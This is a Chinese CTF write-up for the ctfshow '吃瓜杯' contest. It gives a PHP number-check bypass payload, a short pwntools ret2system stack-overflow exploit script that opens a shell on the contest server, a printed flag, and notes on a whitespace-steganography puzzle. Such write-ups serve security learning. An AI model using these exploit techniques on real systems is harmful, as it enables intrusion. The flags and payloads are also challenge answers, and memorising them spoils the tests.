Web:
shellme
题目问题,没什么说的,进去直接搜ctfshow就是flag

热身
签到题,做过web入门的都应该知道怎么绕,分开来看

比如第一个部分可以用小数绕过,第二部分没有字母,可以用8进制绕过。
所以目前得到的payload是

num=010574

但是第三部分还要看0是不是出现在首位,这里就可以用+号,来凑个数
最终payload

num=+010574

PWN
wuqian
只会最简单的,别骂了
就一个栈溢出,找到rdi、system、/bin/sh的地址就行了

from pwn import *
p = remote("pwn.challenge.ctf.show","28125")
#p = process("./pwn")
binsh = 0x601040
system_addr = 0x400490
rdi_addr = 0x400663
p.recv()
payload = 'a'*(0x10+8) + p64(rdi_addr) + p64(binsh) + p64(system_addr)
p.sendline(payload)
p.interactive()

MISC
Misc游戏签到
玩就行了,出bug我也不清楚

ctfshow{White_give_game_only_waste_your_timehahaha}

She Never Owns a Window
看起来很像SNOW,但事实却证明不能用SNOW.EXE解出来。
去请教了一下,就给我说了三句话

1.不是SNOW
2.不需要转换字符
3.有轮子

虽然说了这些,但是我不理解。

只知道是空白的字符,winhex能看出来只含有空格,制表符,换行符
然后就去八神

ctfshow吃瓜杯 八月群赛 WriteUp/WP相关推荐

  1. ctfshow 吃瓜杯八月赛 Misc WriteUp

    目录 1.Misc游戏签到 2.吃瓜 3.EZbingo 4.魔王 5.Dinner of Cyanogen 6.Music Game 7.一群强盗 1.Misc游戏签到 别问 问就是玩游戏 套神说的 ...

  2. ctfshow 吃瓜杯 web 部分题

    目录 热身 shellme shellme_Revenge 热身 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020 ...

  3. CTFshow吃瓜杯的两道web

    Shellme_Revenge 在BsidesCTF2021中出过类似的题,利用的是一些数学上的trick 首先是注意到cookie中的hint,所以在请求中加上?looklook=1即可看到源码: ...

  4. ctfshow吃瓜杯之web(除魔女)详解

    shellme 搜索ctfshow即可 热身 <?phpinclude("flag.php"); highlight_file(__FILE__); if(isset($_G ...

  5. ctfshow吃瓜杯 web

    文章目录 热身 ATTup 代码审计 phar反序列化 shellme shellme_Revenge 热身 <?php/* # -*- coding: utf-8 -*- # @Author: ...

  6. “蚁景杯”WUSTCTF2021新生赛writeup

    "蚁景杯"WUSTCTF2021新生赛writeup Crypto 签到 滴答 AES With RSA GMC Vigenere give you d 银河信号 Misc Erx ...

  7. [ctf.show.reverse] 吃瓜杯 签层饼,Tea_tube_pot

    签层饼 真有一千层函数呀,沿着输入存入的两个变量找,找到3个函数: 主函数给出了flag的组织方式, check1说number2<882408, check2说number1 = number ...

  8. [CTFshow]吃鸡杯

    在?看看密码 给了一个vmem文件,内存取证 搞密码肯定一开始想到系统用户的密码 volatility --profile=Win7SP1x64 -f looklookpassword.vmem hi ...

  9. [CTF]公司“DSFM-圣诞狂欢”杯安全技能赛writeup

    1. Hello everyone 2048的小游戏,不用真正打通关,直接F12即可. 2. 数论 s=m*p%q,要求出m,就可以得到flag. python脚本: p = int('0x9dfe6 ...

最新文章

  1. [JavaScript] JavaScript 值类型使用:与数组有关的API
  2. Android NDK 导出独立工具链
  3. HttpClient 设置不当引发的一次雪崩!
  4. [20150611]优化sql遇到问题.txt
  5. 西门子dcs系统组态手册下载_西门子PLC,PCS7系统介绍
  6. 得到多组单选框的值_多组学如何构建预后预测模型,还发了7分+?
  7. 软件公司产品营销大数据分析(下)
  8. 如何通过系统信息查看 Mac 上的显示刷新率?
  9. 课程设计:基于C52单片机的循迹小车
  10. ITF Demo代码(用VBScript构建的接口测试框架)
  11. Abel逆变换的MATLAB实现(未完成版)
  12. java.lang.IllegalArgumentException: Mapped Statements collection already contains value for ...
  13. Python编曲实践(九):如何计算并估计音乐的调性(大/小调+主音)?Krumhansl-Schmuckler调性分析算法的原理与实现
  14. eval()与train()(结合源码理解)
  15. Python自动化测试详解
  16. k8s资源之pvpvcsc
  17. ST-link驱动下载、安装、配置和升级
  18. loss scale的理解
  19. 漫画 | 悲催的中国式软件开发
  20. javascript 中innerHTML的用法

热门文章

  1. 中国oracle ocm,【Oracle 10g OCM 巅峰之战】
  2. java 不能实例化类型_java不能实例化类型
  3. java编写中显示内部外部,jdk安装好后在cmd上输入java正常,输入javac就显示不是内部外部命令...
  4. Microsoft.Office.Interop.Word 在某一段落前插入新的段落
  5. 计算机专业毕业论文java毕业设计网站SSH人事管理系统|人力请假考勤工资人事奖惩[包运行成功]
  6. 1.设计一个抽奖程序,程序通过随机方式产生中奖序号。程序可以设置序号包含数字位数 和最大序号,一次抽取几个中奖序号(最少 1 个序号,最多不超过 2 个序号)和总共中奖 人数(最少 5 人)。抽奖过程
  7. java nextval_kmp算法中的nextval实例解释
  8. 2022「Cloud 100 China」榜单隆重发布,百望云荣誉登榜
  9. 农村包围城市的『快手』
  10. python写采集程序_用python写的一个wordpress的采集程序